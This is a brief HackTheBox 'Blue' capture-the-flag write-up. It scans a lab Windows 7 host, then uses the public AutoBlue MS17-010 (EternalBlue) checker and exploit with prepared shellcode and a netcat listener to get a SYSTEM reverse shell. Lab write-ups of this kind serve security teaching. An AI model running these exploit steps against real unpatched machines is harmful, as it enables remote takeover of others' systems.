HackTheBox:Blue

Al1z4deh:~# echo "Welcome"
3 min readJul 26, 2022

Today we will take a look at HackTheBox:Blue. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sCV --open -oN nmap/open 10.10.10.40PORT      STATE SERVICE      VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-26T05:58:12
|_ start_date: 2022-07-26T05:54:11
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-26T06:58:09+01:00
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s

We see that the machine here is Windows 7. open on smb port. Yes EternalBlue Exploit that comes to mind | MS17–010

  • Exploit

Let’s download and check.

─# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git└─# cd AutoBlue-MS17-010└─# python eternal_checker.py 10.10.10.40 
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done

Yes, now let’s run the exploit and get a shell.

  • System
└─# cd shellcode└─# ./shell_prep.sh
└─# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

And now we are the system

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--